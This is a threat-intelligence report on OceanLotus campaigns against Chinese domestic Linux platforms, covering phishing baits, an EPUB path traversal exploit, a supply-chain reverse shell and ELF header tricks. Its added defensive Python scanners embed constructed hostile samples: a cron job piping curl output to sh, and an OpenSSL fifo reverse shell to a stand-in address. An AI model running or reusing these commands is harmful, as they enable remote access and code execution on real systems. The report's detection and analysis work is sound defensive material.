
Overview

In 2022, the RedDrip team of the QiAnXin Threat Intelligence Center first disclosed, in the Operation Typhoon[1] report, attacks by the OceanLotus group against domestic information innovation (indigenous innovation) systems. Because indigenous innovation terminals were still rare at the time, yet often hold sensitive government information, we only issued a warning about the trend. In the years since, we have tracked several groups, including APT-Q-95, UTG-Q-008 and an unattributed organization, continuously targeting indigenous innovation platforms and government networks. Their core purpose is to steal government data and to probe national policies and future development strategies.

As in 2022, OceanLotus used the same Trojan seen in Operation Hurricane[2] to attack the Windows and indigenous innovation platforms simultaneously, delivering spear-phishing emails with attachments in formats such as lnk, desktop, jar and epub. Notably, in the October to November 2025 activity against the Windows platform, OceanLotus appeared to suffer from "TianQing PTSD": the latest loader explicitly checks the victim's process list for TianQing-related processes and exits immediately if any is found. In doing so, the attackers have inadvertently solved a long-standing problem for defenders, namely users who click "allow" when the TianQing Hex Engine intercepts the payload at startup.

TianQing V10 for indigenous innovation platforms can already alert on spear-phishing baits such as desktop files. We recommend that users of TianQing V8 for indigenous innovation platforms upgrade to V10 and enable cloud-based scanning to defend against these conventional tactics.


Attack Surface

Apart from the internal network terminal supply chain, the current attack methods against indigenous innovation platforms are no different from those against Linux desktops; the techniques are highly homogeneous. The core question is therefore how foreign intelligence agencies accurately identify which units' mailboxes have migrated to an indigenous innovation environment during this wave of replacement. According to the intelligence we hold, OceanLotus cannot yet achieve precise phishing. Its strategy relies mainly on email probes and document probes to screen and exclude targets, ultimately raising the success rate through mass phishing emails.


Desktop Bait

Desktop files on indigenous innovation platforms play the role that LNK files play on Windows and are the most common bait format on Linux; foreign groups such as APT36 have used them in attacks targeting India.

After the victim double-clicks the file, the command in its Exec field is executed.

The command generally creates a scheduled task that continuously requests the C2 server, waiting for the second-stage payload to be issued.
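To make the above concrete, the following is an added triage script, not code from the report or from any sample it describes. It parses the [Desktop Entry] group, strips the launcher field codes (%f, %U and so on) from Exec, and flags the traits a bait of this kind typically has: a downloader, a persistence mechanism, an inline interpreter, a document-style Name on an Application entry, and a file path inside an autostart directory. The two .desktop files and the C2 address are constructed for illustration; the indicator list is an assumption about what is worth flagging, not the report's detection logic.

```python
import re

# Constructed sample .desktop bait (not a file from the report): it presents as a
# PDF, installs a cron beacon and then opens a local decoy so the victim sees a document.
SAMPLE_BAIT = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "echo '*/5 * * * * curl -fsSL http://198.51.100.10/s | sh' | crontab -; xdg-open /tmp/Meeting_Notice.pdf"
"""

# Constructed benign launcher for comparison.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=LibreOffice Writer
Icon=libreoffice-writer
Exec=libreoffice --writer %U
"""

# (label, regex) pairs applied to the Exec command after field codes are removed.
# The list is an assumption for illustration, not a complete signature set.
EXEC_INDICATORS = [
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("persistence", re.compile(r"\bcrontab\b|/etc/cron|\.config/autostart|systemd-run|\.timer\b")),
    ("inline interpreter", re.compile(r"\b(bash|sh|dash|zsh|python3?|perl)\s+-c\b")),
    ("encoded stage", re.compile(r"base64\s+(-d|--decode)\b")),
    ("pipe to shell", re.compile(r"\|\s*(bash|sh|dash)\b")),
]
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".wps", ".et")
# Locations where a dropped .desktop file runs at login rather than on click.
AUTOSTART_DIRS = ("/.config/autostart/", "/etc/xdg/autostart/")


def parse_desktop(text):
    """Return the key=value pairs of the [Desktop Entry] group."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def analyze_desktop(text, path=""):
    """Return a list of (label, evidence) findings for one .desktop file."""
    entry = parse_desktop(text)
    findings = []
    # Field codes such as %f or %U are placeholders filled in by the launcher.
    command = re.sub(r"%[A-Za-z%]", "", entry.get("Exec", ""))
    for label, pattern in EXEC_INDICATORS:
        match = pattern.search(command)
        if match:
            findings.append((label, match.group(0)))
    name = entry.get("Name", "")
    if entry.get("Type") == "Application" and name.lower().endswith(DOC_EXTENSIONS):
        findings.append(("document-named launcher", name))
    if any(d in path for d in AUTOSTART_DIRS):
        findings.append(("autostart location", path))
    return findings


if __name__ == "__main__":
    for label, evidence in analyze_desktop(SAMPLE_BAIT):
        print(f"{label}: {evidence}")
```

Running it over a user's ~/Desktop, ~/.local/share/applications and the two autostart directories is a cheap sweep; the document-named Application entry alone is a strong signal, since a genuine launcher for a PDF would be Type=Link or would simply be the PDF itself.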

PDF baits usually arrive inside compressed archives, but there are also cases where the Exec command directly invokes the indigenous innovation system's WPS to open a remote document:


JAR Bait

Most government indigenous innovation terminals ship with Java and Python runtimes installed by default and can run JAR files and PY scripts directly. In early 2025, OceanLotus delivered attachments such as "The Path of FTAAP and China's Solution.jar," "Project Proposal Review Report Approval Form (General Form).docx.jar," and "Energy Supply and Demand Report.xls.jar."

The JAR first checks whether the current terminal is a Linux system; if so, it drops the downloader (report-scheduler-1.0-SNAPSHOT.jar) and creates a scheduled task.
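The following is an added example of how a mail gateway or analyst can triage such an attachment without running it; it is not code from the report or from the attachment itself. It opens the JAR as a ZIP, reads the Main-Class from the manifest, and lists entries that a launcher JAR has no reason to carry: nested archives or scripts (the dropped second stage) and an embedded office document (the decoy). The JAR built by build_sample_jar, its class name and its entry names are constructed for illustration; only the double-extension attachment name used in the test comes from the report.

```python
import io
import re
import zipfile

# Attachment names that hide a .jar behind a document extension.
DOUBLE_EXTENSION = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|wps|et)\.jar$", re.IGNORECASE)
# Entry types a launcher JAR has no business carrying (assumed list for illustration).
PAYLOAD_EXTENSIONS = (".jar", ".py", ".sh", ".desktop", ".so", ".bin")
DECOY_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wps", ".et")


def build_sample_jar():
    """Constructed sample JAR, not the real attachment: a launcher class plus a
    nested jar (second stage) and an Excel decoy to display after infection."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nMain-Class: com.example.Launcher\r\n\r\n")
        zf.writestr("com/example/Launcher.class", b"\xca\xfe\xba\xbe" + b"\x00" * 28)
        zf.writestr("resources/updater.jar", b"PK\x03\x04" + b"\x00" * 26)
        zf.writestr("resources/report.xls", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def manifest_main_class(zf):
    """Return the Main-Class declared in META-INF/MANIFEST.MF, or None."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("main-class:"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_jar(data, filename):
    """Return (label, evidence) findings for a JAR attachment given its bytes and name."""
    findings = []
    if DOUBLE_EXTENSION.search(filename):
        findings.append(("double extension", filename))
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        main_class = manifest_main_class(zf)
        if main_class:
            findings.append(("main class", main_class))
        for name in zf.namelist():
            lowered = name.lower()
            if lowered.endswith(PAYLOAD_EXTENSIONS):
                findings.append(("embedded payload", name))
            elif lowered.endswith(DECOY_EXTENSIONS):
                findings.append(("embedded decoy document", name))
    return findings


if __name__ == "__main__":
    for label, evidence in inspect_jar(build_sample_jar(), "Energy Supply and Demand Report.xls.jar"):
        print(f"{label}: {evidence}")
```

The double-extension rule catches the names quoted above directly; the entry scan is what matters once attackers stop using them, since the launcher-plus-payload-plus-decoy layout is independent of the file name.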

It then opens the bait document:


epub File Vulnerability

In mid-2025, OceanLotus delivered EPUB files exploiting an N-day vulnerability:

Analysis showed it to be the Atril EPUB path traversal vulnerability disclosed in January 2024:

The EPUB drops desktop-service-7803.desktop into the autostart directory for persistence and .icWpnBHQc0Ka.desktop into the .config directory. The .desktop entry decrypts .icWpnBHQc0Ka, which ultimately runs a Python downloader.

The vulnerability reproduction is shown below:


Internal Network Supply Chain

As in the 2024 incident in which a Windows-platform security terminal was used for distribution, this case involves several domestic software products with terminal management functions. OceanLotus entered the internal network through spear-phishing emails and then attempted to brute-force the internal indigenous innovation security server, but failed. After nearly a month, the server was, we suspect, compromised through a 0-day exploit, and malicious update scripts were pushed to both the indigenous innovation terminals and the Windows terminals on the internal network. The malicious update script for the indigenous innovation terminals is as follows:

It uses OpenSSL to establish a reverse shell, after which the second-stage sample is delivered. This is also the first known supply chain attack on a domestic indigenous innovation platform.
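An update script that opens a reverse shell with OpenSSL is a small target for detection: the script is plain text, the shell must be wired to openssl s_client through a fifo or similar, and the C2 address appears literally in the -connect argument. The following is an added example of scanning such scripts before they are executed by an update agent; it is not the report's script or detection content. The sample script and the C2 address are constructed for illustration, and the rule set is an assumption about common reverse-shell forms (openssl, /dev/tcp, netcat -e, interactive shell piped elsewhere), not a complete signature list.

```python
import re

# Constructed sample update script for illustration; it is not the script recovered
# from the incident. The last two lines are the classic fifo + openssl s_client reverse shell.
SAMPLE_UPDATE_SCRIPT = """#!/bin/sh
# agent self-update
VER=$(cat /opt/agent/VERSION)
cp /tmp/agent-update.bin /opt/agent/agent && chmod 755 /opt/agent/agent
rm -f /tmp/.f; mkfifo /tmp/.f
/bin/sh -i < /tmp/.f 2>&1 | openssl s_client -quiet -connect 203.0.113.5:443 > /tmp/.f 2>/dev/null &
"""

# Each rule names the technique; an optional "endpoint" group captures the C2 address.
RULES = [
    ("openssl-reverse-shell",
     re.compile(r"openssl\s+s_client\b.*?-connect\s+(?P<endpoint>[\w.\-]+:\d+)", re.I)),
    ("dev-tcp-reverse-shell",
     re.compile(r"/dev/(?:tcp|udp)/(?P<endpoint>[\w.\-]+/\d+)", re.I)),
    ("netcat-exec",
     re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\s", re.I)),
    ("interactive-shell-pipe",
     re.compile(r"\b(?:sh|bash|dash|zsh)\s+-i\b.*\|", re.I)),
]


def scan_update_script(text):
    """Return (rule, line_number, endpoint) for every matching non-comment line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for rule, pattern in RULES:
            match = pattern.search(line)
            if match:
                findings.append((rule, lineno, match.groupdict().get("endpoint")))
    return findings


def c2_endpoints(text):
    """Set of host:port (or host/port) strings extracted from reverse-shell findings."""
    return {endpoint for _, _, endpoint in scan_update_script(text) if endpoint}


if __name__ == "__main__":
    for rule, lineno, endpoint in scan_update_script(SAMPLE_UPDATE_SCRIPT):
        print(f"line {lineno}: {rule} {endpoint or ''}")
```

Because s_client -quiet wraps the session in TLS, network sensors see only an outbound TLS connection from the update agent's host; the reliable place to catch this is on the endpoint, either by scanning the script as above or by alerting on openssl spawned as a child of a shell with a fifo on its file descriptors.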

The malicious update component for the Windows terminals is as follows:


Weapon Introduction

Customized Trojan for Indigenous Innovation Platforms

The ELF Trojan that OceanLotus drops on indigenous innovation platforms differs slightly from a conventional Linux ELF file:

The Trojan achieves targeted compatibility by zeroing the three bytes that follow the ELF magic number (EI_CLASS, EI_DATA and EI_VERSION, which identify bitness, endianness and header version). A traditional Linux system refuses to execute the file because of the malformed header, while the indigenous innovation platform parses and runs it normally. This carefully designed detail shows how deeply OceanLotus understands the low-level workings of domestic indigenous innovation systems.
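The same three bytes are what most triage tooling reads first, so a sample prepared this way tends to be reported as an invalid ELF rather than analysed. The following is an added helper, not code from the report, that detects the blanked e_ident and restores EI_CLASS, EI_DATA and EI_VERSION by inference from e_machine (which the Trojan leaves intact) so the file can be loaded into standard tools. The 64-byte header it builds is constructed for illustration; the e_machine hint table is an assumption covering the architectures commonly found on domestic desktops, and it deliberately omits machines such as MIPS whose class and endianness cannot be inferred from e_machine alone.

```python
import struct

ELFMAG = b"\x7fELF"
EI_CLASS, EI_DATA, EI_VERSION = 4, 5, 6
CLASS_NAMES = {0: "ELFCLASSNONE", 1: "ELF32", 2: "ELF64"}
DATA_NAMES = {0: "ELFDATANONE", 1: "little-endian", 2: "big-endian"}
# e_machine -> (EI_CLASS, EI_DATA, name). Assumed table for illustration; only
# machines whose class and endianness follow from e_machine are listed.
MACHINE_HINTS = {
    0x03: (1, 1, "x86"),
    0x28: (1, 1, "ARM"),
    0x3E: (2, 1, "x86-64"),
    0xB7: (2, 1, "AArch64"),
    0xF3: (2, 1, "RISC-V"),
    0x102: (2, 1, "LoongArch"),
}


def build_sample_header():
    """Constructed 64-byte ELF64 x86-64 header (ET_DYN), not a sample from the report."""
    ident = ELFMAG + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    return struct.pack("<16sHHIQQQIHHHHHH", ident,
                       3, 0x3E, 1, 0x1040, 64, 0, 0, 64, 56, 2, 64, 0, 0)


def blank_ident(data):
    """Apply the trick described above: zero EI_CLASS, EI_DATA and EI_VERSION."""
    return data[:4] + b"\x00\x00\x00" + data[7:]


def parse_ident(data):
    """Decode the e_ident fields plus e_machine (tried little-endian, then big-endian)."""
    if len(data) < 20 or data[:4] != ELFMAG:
        raise ValueError("not an ELF file")
    machine_le = struct.unpack_from("<H", data, 18)[0]
    machine_be = struct.unpack_from(">H", data, 18)[0]
    machine = machine_le if machine_le in MACHINE_HINTS else machine_be
    return {
        "class": data[EI_CLASS], "class_name": CLASS_NAMES.get(data[EI_CLASS], "?"),
        "data": data[EI_DATA], "data_name": DATA_NAMES.get(data[EI_DATA], "?"),
        "version": data[EI_VERSION],
        "machine": machine,
        "machine_name": MACHINE_HINTS.get(machine, (0, 0, "unknown"))[2],
    }


def is_blanked_ident(data):
    """True when the magic is intact but class, data and version are all zero."""
    return data[:4] == ELFMAG and data[EI_CLASS:EI_VERSION + 1] == b"\x00\x00\x00"


def repair_ident(data):
    """Restore class/data/version from e_machine so standard tooling will parse the file."""
    info = parse_ident(data)
    if info["machine"] not in MACHINE_HINTS:
        raise ValueError("cannot infer class/endianness for e_machine 0x%x" % info["machine"])
    cls, enc, _ = MACHINE_HINTS[info["machine"]]
    return data[:4] + bytes([cls, enc, 1]) + data[7:]


if __name__ == "__main__":
    blanked = blank_ident(build_sample_header())
    print(is_blanked_ident(blanked), parse_ident(blanked)["machine_name"])
    print(parse_ident(repair_ident(blanked))["class_name"])
```

Two caveats: a repaired header is for analysis only, since the sample's own loader chain may depend on the original bytes; and a check for "magic intact, next three bytes zero" is worth adding to file-scanning rules, because no legitimate toolchain emits that combination.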

The ELF Trojan's core logic is consistent with the Rust Trojan in Operation Hurricane[2].

OceanLotus has long pursued turning PE files into shellcode in its Trojans, and the same applies on indigenous innovation platforms. In the latest activity, the Trojans have begun to use multiple nested layers of encryption, ultimately executing the shellcode-ized Rust Trojan.


Lightweight Trojan

To suit internal network supply chain attacks, OceanLotus has designed a variety of lightweight Trojans. Most use custom protocols with a relatively simple command set and are likely intended for one-time use.


Type One (Internal Network Node)

This Trojan connects back to port 15001 on the internal network security server using a custom protocol and supports two remote commands, ping and init. On ping, the server replies "pong"; on init, the received shellcode is executed via CreateThread.


Type Two

An ELF Trojan packaged with PyInstaller; it reads a configuration file from the same directory:

It calls the sign function to decrypt it:

After decryption, it calls the protect function to enter the main logic:

It splits the decrypted data into the remote IP (d) and port (c) and reconnects over SSL:

It splits the data received from the C2 server and branches on the command:

The core function is executing commands passed by the attacker via subprocess.check_output.


Passive Backdoor Targeting IoT Devices

When OceanLotus infiltrated domestic border routers, it implanted an open-source passive backdoor and set up portmap port forwarding to an external C2 server, similar to the previously disclosed Operation OceanStorm[3].

Analysis identified it as the open-source project apache2_BackdoorMod:

It listens on local port 32227:


IOC

MD5

31d2192170e92579779b30aea102c121

9c70b4d193aaf41241d86fb45920564c

bc99b603530609d7b6f40c7f912fbe2e

7b9f197532d342af5244ef1d3f2e9f4d

a898d4d6e24a4612effa2b13d885fe99

5cfb68302f0736754906442185b2c0d5

3ae561425ac07975fdf4cd1d9c893534

e1e3da8296ea93b3b4f49c959c6f6815

467f39b8c0efad1202fcd111005a6f03


Reference Links

[1] https://ti.qianxin.com/blog/articles/peeking-at-the-cyber-sea-lotus-of-the-nine-dash-line-in-the-south-china-sea/

[2] https://ti.qianxin.com/blog/articles/operation-hurricane-a-brief-discussion-of-the-techniques-and-tactics-of-the-new-oceanlotus-group-in-memory-cn/

[3] https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/
